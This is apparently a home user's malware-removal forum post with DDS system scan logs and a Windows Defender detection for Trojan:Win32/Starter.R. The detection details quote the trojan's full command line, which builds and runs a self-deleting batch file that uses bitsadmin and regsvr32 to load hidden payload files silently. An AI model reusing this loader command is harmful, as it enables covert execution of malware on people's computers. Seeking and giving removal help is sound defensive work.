S3 Ramdisk;Windows RAM Disk Driver;C:\WINDOWS\System32\drivers\ramdisk.sys [2018-4-11 39840]
S3 ReFS;ReFS;C:\WINDOWS\System32\drivers\refs.sys [2018-8-17 1921944]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2018-8-17 945568]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k rdxgroup [2018-4-11 51288]
S3 rhproxy;Resource Hub proxy driver;C:\WINDOWS\System32\drivers\rhproxy.sys [2018-4-11 104448]
S3 RTL8168;Realtek 8168 NT Driver;C:\WINDOWS\System32\drivers\Rt630x64.sys [2018-8-16 690832]
S3 SandraAgentSrv;SiSoftware Deployment Agent Service;C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\RpcAgentSrv.exe [2018-9-14 136192]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2018-4-11 51288]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2018-8-17 128920]
S3 SDFRd;SDF Reflector;C:\WINDOWS\System32\drivers\SDFRd.sys [2018-4-11 33176]
S3 SEMgrSvc;Payments and NFC/SE Manager;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2018-4-11 1273344]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2018-4-11 154528]
S3 SharedRealitySvc;Spatial Data Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SmbDrv;SmbDrv;C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [2012-8-24 41272]
S3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2012-8-24 43832]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2018-4-11 51288]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 SpatialGraphFilter;Holographic Spatial Graph Filter;C:\WINDOWS\System32\drivers\SpatialGraphFilter.sys [2018-4-11 57752]
S3 spectrum;Windows Perception Service;C:\WINDOWS\System32\Spectrum.exe [2018-8-17 976384]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2018-8-17 105368]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2018-8-17 48544]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2018-4-11 303616]
S3 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2018-4-11 128512]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2018-4-11 152576]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2018-4-11 57856]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2018-4-11 45056]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2018-8-17 29600]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2018-4-11 282008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2018-4-11 98200]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2018-4-11 144288]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2018-4-11 29088]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2018-4-11 67992]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2018-4-11 28064]
S3 VacSvc;Volumetric Audio Compositor Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2018-4-11 35328]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2018-8-17 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2018-4-11 51288]
S3 WaaSMedicSvc;Windows Update Medic Service;C:\WINDOWS\System32\svchost.exe -k wusvcs -p [2018-4-11 51288]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2018-4-11 82944]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2018-8-17 781824]
S3 WdmCompanionFilter;WdmCompanionFilter;C:\WINDOWS\System32\drivers\WdmCompanionFilter.sys [2018-4-11 21408]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2018-4-11 32152]
S3 WinNat;Windows NAT Driver;C:\WINDOWS\System32\drivers\winnat.sys [2018-8-17 227840]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2018-4-11 64920]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2018-4-11 264192]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2018-8-17 295424]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2018-4-11 46592]
S4 hvcrash;hvcrash;C:\WINDOWS\System32\drivers\hvcrash.sys [2018-4-11 33184]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S4 ssh-agent;OpenSSH Authentication Agent;C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [2018-4-12 495616]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: opera.exe: open="C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2018-10-09 08:44:41 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{765F7C9F-1CB4-4B4B-A7B4-9A30AEF02AB2}\mpengine.dll
2018-10-09 07:07:14 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2018-10-04 07:15:04 -------- d-----w- C:\Program Files (x86)\Ruiware
2018-10-04 07:15:03 -------- d-----w- C:\ProgramData\InstallMate
2018-09-30 05:31:57 -------- d-----w- C:\WINDOWS\SysWow64\wdegbma
2018-09-29 02:10:59 -------- d-----w- C:\Program Files (x86)\Microsoft ASP.NET
2018-09-28 04:42:44 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\CEF
2018-09-28 04:42:24 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Facebook
2018-09-25 06:22:32 -------- d-----w- C:\WINDOWS\Panther
2018-09-22 17:04:38 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Cyberlink
2018-09-20 10:13:39 1821184 ----a-w- C:\WINDOWS\System32\IDTNC64.cpl
2018-09-20 10:12:31 542208 ----a-w- C:\WINDOWS\System32\drivers\stwrt64.sys
2018-09-20 10:12:30 499200 ----a-w- C:\WINDOWS\System32\stcplx64.dll
2018-09-20 10:12:29 671744 ------w- C:\WINDOWS\System32\stapi64.dll
2018-09-20 10:12:29 255488 ----a-w- C:\WINDOWS\System32\st646425.dll
2018-09-20 10:12:29 2188800 ----a-w- C:\WINDOWS\System32\stapo64.dll
2018-09-20 10:12:14 -------- d-----w- C:\Program Files\IDT
2018-09-20 08:42:02 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\AppEx Networks
2018-09-20 08:37:15 228032 ----a-w- C:\WINDOWS\System32\drivers\appexDrv.sys
2018-09-20 08:37:14 -------- d-----w- C:\Program Files\AMD Quick Stream
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\Common Files\ATI Technologies
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\AMD AVT
2018-09-20 08:35:42 -------- d-----w- C:\Program Files\ATI Technologies
2018-09-20 08:23:04 -------- d-----w- C:\AMD
2018-09-14 10:29:33 -------- d-----w- C:\T32768
2018-09-14 09:13:17 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Roaming\AMD
2018-09-14 08:39:12 -------- d-----w- C:\ProgramData\Package Cache
2018-09-14 08:38:25 -------- d-----w- C:\Program Files\SiSoftware
2018-09-12 09:46:59 2172928 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
.
==================== Find3M ====================
.
2018-10-06 07:18:38 65536 ----a-w- C:\WINDOWS\System32\spu_storage.bin
2018-09-25 06:33:29 60584 ----a-w- C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys
2018-09-25 06:33:28 46184 ----a-w- C:\WINDOWS\System32\drivers\wd\WdBoot.sys
2018-09-25 06:33:28 352424 ----a-w- C:\WINDOWS\System32\drivers\wd\WdFilter.sys
2018-09-04 23:04:15 835144 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2018-09-04 23:04:15 179808 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2018-08-31 07:46:43 542504 ----a-w- C:\WINDOWS\System32\pcasvc.dll
2018-08-31 07:45:55 348328 ----a-w- C:\WINDOWS\System32\MusNotifyIcon.exe
2018-08-31 07:43:10 1524152 ----a-w- C:\WINDOWS\System32\msctf.dll
2018-08-31 07:42:49 1636232 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2018-08-31 07:27:25 56320 ----a-w- C:\WINDOWS\System32\mf3216.dll
2018-08-31 07:27:10 178176 ----a-w- C:\WINDOWS\System32\t2embed.dll
2018-08-31 07:26:21 101888 ----a-w- C:\WINDOWS\System32\drivers\bowser.sys
2018-08-31 07:25:18 270336 ----a-w- C:\WINDOWS\System32\spp.dll
2018-08-31 07:25:12 266752 ----a-w- C:\WINDOWS\System32\rstrui.exe
2018-08-31 07:24:35 482304 ----a-w- C:\WINDOWS\System32\srcore.dll
2018-08-31 07:24:33 1127936 ----a-w- C:\WINDOWS\System32\nettrace.dll
2018-08-31 07:23:48 1364992 ----a-w- C:\WINDOWS\System32\bcastdvruserservice.dll
2018-08-31 07:23:34 765440 ----a-w- C:\WINDOWS\System32\tdh.dll
2018-08-31 07:22:53 1855488 ----a-w- C:\WINDOWS\System32\msxml3.dll
2018-08-31 07:22:19 1661440 ----a-w- C:\WINDOWS\System32\GdiPlus.dll
2018-08-31 06:55:04 1455960 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2018-08-31 06:53:26 1327504 ----a-w- C:\WINDOWS\SysWow64\msctf.dll
2018-08-31 06:41:56 43008 ----a-w- C:\WINDOWS\SysWow64\mf3216.dll
2018-08-31 06:41:34 138752 ----a-w- C:\WINDOWS\SysWow64\t2embed.dll
2018-08-31 06:40:01 216576 ----a-w- C:\WINDOWS\SysWow64\spp.dll
2018-08-31 06:37:50 622080 ----a-w- C:\WINDOWS\SysWow64\tdh.dll
2018-08-31 06:37:13 1585664 ----a-w- C:\WINDOWS\SysWow64\msxml3.dll
2018-08-31 06:36:04 1469952 ----a-w- C:\WINDOWS\SysWow64\GdiPlus.dll
2018-08-31 03:50:07 270648 ----a-w- C:\WINDOWS\System32\SgrmEnclave_secure.dll
2018-08-31 03:50:05 273720 ----a-w- C:\WINDOWS\System32\SgrmEnclave.dll
2018-08-31 03:44:28 1222440 ----a-w- C:\WINDOWS\System32\hvix64.exe
2018-08-31 03:44:27 1030952 ----a-w- C:\WINDOWS\System32\hvax64.exe
2018-08-31 03:44:22 76256 ----a-w- C:\WINDOWS\System32\drivers\hvservice.sys
2018-08-31 03:44:19 1064744 ----a-w- C:\WINDOWS\System32\SecConfig.efi
2018-08-31 03:44:18 568600 ----a-w- C:\WINDOWS\System32\tcblaunch.exe
2018-08-31 03:44:15 136488 ----a-w- C:\WINDOWS\System32\hvloader.dll
2018-08-31 03:43:40 722880 ----a-w- C:\WINDOWS\System32\ci.dll
2018-08-31 03:43:19 2719216 ----a-w- C:\WINDOWS\System32\drivers\tcpip.sys
2018-08-31 03:28:56 1989496 ----a-w- C:\WINDOWS\SysWow64\msxml6.dll
2018-08-31 03:28:50 1514352 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2018-08-31 03:28:44 6043680 ----a-w- C:\WINDOWS\SysWow64\windows.storage.dll
2018-08-31 03:28:42 134936 ----a-w- C:\WINDOWS\SysWow64\gdi32.dll
2018-08-31 03:28:38 6570040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2018-08-31 03:28:37 453104 ----a-w- C:\WINDOWS\SysWow64\dpx.dll
2018-08-31 03:28:24 1129728 ----a-w- C:\WINDOWS\SysWow64\msvproc.dll
2018-08-31 03:28:20 568568 ----a-w- C:\WINDOWS\SysWow64\CoreMessaging.dll
2018-08-31 03:26:44 25847808 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2018-08-31 03:21:14 22008320 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2018-08-31 03:18:30 8189440 ----a-w- C:\WINDOWS\System32\Windows.Data.Pdf.dll
2018-08-31 03:17:08 144384 ----a-w- C:\WINDOWS\System32\mssprxy.dll
2018-08-31 03:17:01 20480 ----a-w- C:\WINDOWS\System32\netevent.dll
2018-08-31 03:16:47 6661120 ----a-w- C:\WINDOWS\SysWow64\Windows.Data.Pdf.dll
2018-08-31 03:16:03 4382720 ----a-w- C:\WINDOWS\System32\EdgeContent.dll
2018-08-31 03:15:44 4866560 ----a-w- C:\WINDOWS\System32\jscript9.dll
2018-08-31 03:15:40 3392512 ----a-w- C:\WINDOWS\System32\tquery.dll
2018-08-31 03:15:13 7577088 ----a-w- C:\WINDOWS\System32\Chakra.dll
2018-08-31 03:15:07 894464 ----a-w- C:\WINDOWS\System32\webplatstorageserver.dll
2018-08-31 03:15:03 395776 ----a-w- C:\WINDOWS\System32\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:15:02 75776 ----a-w- C:\WINDOWS\System32\drivers\mpsdrv.sys
2018-08-31 03:14:53 2700288 ----a-w- C:\WINDOWS\SysWow64\tquery.dll
2018-08-31 03:14:50 154112 ----a-w- C:\WINDOWS\System32\Chakradiag.dll
2018-08-31 03:14:42 898560 ----a-w- C:\WINDOWS\System32\WpcWebFilter.dll
2018-08-31 03:14:31 808448 ----a-w- C:\WINDOWS\System32\EdgeManager.dll
2018-08-31 03:14:26 726528 ----a-w- C:\WINDOWS\System32\jscript9diag.dll
2018-08-31 03:13:19 402432 ----a-w- C:\WINDOWS\System32\drivers\ks.sys
2018-08-31 03:13:07 2738688 ----a-w- C:\WINDOWS\System32\mssrch.dll
2018-08-31 03:13:01 1708544 ----a-w- C:\WINDOWS\System32\MSPhotography.dll
2018-08-31 03:12:51 736256 ----a-w- C:\WINDOWS\System32\drivers\srv2.sys
2018-08-31 03:12:36 20480 ----a-w- C:\WINDOWS\SysWow64\netevent.dll
2018-08-31 03:11:38 796672 ----a-w- C:\WINDOWS\System32\mssvp.dll
2018-08-31 03:11:29 2236928 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2018-08-31 03:11:19 1854976 ----a-w- C:\WINDOWS\System32\wevtsvc.dll
2018-08-31 03:11:18 1057792 ----a-w- C:\WINDOWS\System32\SearchIndexer.exe
2018-08-31 03:11:11 604160 ----a-w- C:\WINDOWS\System32\updatehandlers.dll
2018-08-31 03:11:07 406528 ----a-w- C:\WINDOWS\System32\SearchProtocolHost.exe
2018-08-31 03:10:55 608768 ----a-w- C:\WINDOWS\SysWow64\EdgeManager.dll
2018-08-31 03:10:55 1375744 ----a-w- C:\WINDOWS\System32\usocore.dll
2018-08-31 03:10:49 3711488 ----a-w- C:\WINDOWS\SysWow64\jscript9.dll
2018-08-31 03:10:45 5777920 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2018-08-31 03:10:42 889344 ----a-w- C:\WINDOWS\System32\schedsvc.dll
2018-08-31 03:10:40 288768 ----a-w- C:\WINDOWS\SysWow64\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:10:28 1361408 ----a-w- C:\WINDOWS\SysWow64\MSPhotography.dll
2018-08-31 03:10:27 561152 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2018-08-31 03:10:26 176640 ----a-w- C:\WINDOWS\System32\mssph.dll
2018-08-31 03:09:58 578560 ----a-w- C:\WINDOWS\SysWow64\webplatstorageserver.dll
2018-08-31 03:09:23 2258944 ----a-w- C:\WINDOWS\SysWow64\mssrch.dll
2018-08-31 03:08:28 619520 ----a-w- C:\WINDOWS\SysWow64\WpcWebFilter.dll
2018-08-31 03:07:32 856064 ----a-w- C:\WINDOWS\SysWow64\SearchIndexer.exe
2018-08-31 03:07:14 735744 ----a-w- C:\WINDOWS\SysWow64\mssvp.dll
2018-08-31 03:06:57 345088 ----a-w- C:\WINDOWS\SysWow64\SearchProtocolHost.exe
2018-08-30 04:44:37 152688 ----a-w- C:\WINDOWS\System32\drivers\mbae64.sys
2018-08-28 09:27:28 1952768 ----a-w- C:\WINDOWS\NDE2ZDRjZ.exe
2018-08-28 07:17:55 23862784 ----a-w- C:\WINDOWS\System32\Hydrogen.dll
2018-08-28 06:56:08 1008640 ----a-w- C:\WINDOWS\System32\Windows.Media.MixedRealityCapture.dll
2018-08-28 06:49:46 677376 ----a-w- C:\WINDOWS\System32\HeadTrackerStorage.dll
2018-08-28 06:48:22 1274368 ----a-w- C:\WINDOWS\System32\HoloSI.PCShell.dll
2018-08-28 06:45:57 713216 ----a-w- C:\WINDOWS\System32\SharedRealitySvc.dll
2018-08-28 05:51:14 868864 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.MixedRealityCapture.dll
2018-08-18 00:47:08 563832 ------w- C:\WINDOWS\System32\MpSigStub.exe
.
============= FINISH: 20:06:10.54 ===============
Thank you for your time and assistance.
P.S. I don't think I have easy access to windows boot cd
THIS IS WHAT "DETAILS" DEFENDER GIVES EACH TIME IT NOTIFIES ME OF IT
Trojan:Win32/Starter.R
CmdLine: \Device\HarddiskVolume4\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /complete 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /cancel 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo if exist "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" goto q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\89331b0d-24f7-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\%i" >> "C:\ProgramData\89331b0d-24f7-1\x.bat")) > nul & echo :q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo del "C:\ProgramData\89331b0d-24f7-1\x.bat" ^& exit >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & "C:\ProgramData\89331b0d-24f7-1\x.bat""
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.17134.1
Run by Christopher&Gabriell at 20:04:03 on 2018-10-09
Microsoft Windows 10 Home 10.0.17134.0.1252.1.1033.18.3554.1271 [GMT -5:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\svchost.exe -k RPCSS -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs -p
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\system32\atiesrxx.exe
C:\WINDOWS\system32\atieclxx.exe
C:\WINDOWS\system32\svchost.exe -k LocalService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Program Files\IDT\WDM\STacSV64.exe
C:\WINDOWS\system32\svchost.exe -k appmodel -p
C:\WINDOWS\System32\svchost.exe -k NetworkService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\Hpservice.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\WINDOWS\system32\svchost.exe -k apphost
C:\WINDOWS\System32\svchost.exe -k utcsvc -p
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Core Temp\Core Temp.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
C:\Windows\System32\CastSrv.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Program Files\Windows Defender\MSASCuiL.exe
C:\Program Files\IDT\WDM\sttray64.exe
C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
C:\WINDOWS\system32\osk.exe
C:\Program Files\WindowsApps\Microsoft.WindowsStore_11809.1001.8.0_x64__8wekyb3d8bbwe\WinStore.App.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18081.14710.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera_crashreporter.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe
C:\WINDOWS\SysWOW64\DllHost.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
C:\WINDOWS\system32\browser_broker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\Windows.WARP.JITService.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Windows\System32\smartscreen.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
svchost.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uLocal Page = %11%\blank.htm
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
uRun: [WinPatrol] C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe
mRun: [HP CoolSense] C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe -byrunkey
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: EnableFullTrustStartupTasks = dword:2
mPolicies-System: EnableUwpStartupTasks = dword:2
mPolicies-System: SupportFullTrustStartupTasks = dword:1
mPolicies-System: SupportUwpStartupTasks = dword:1
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~1\Office16\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~1\MICROS~1\Office16\ONBttnIE.dll/105
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIE.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://www.pcpitstop.com/nirvana/controls/pcmatic.cab
TCP: Interfaces\{982D5C35-5D95-44B3-84D9-0D16030AAD83} : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
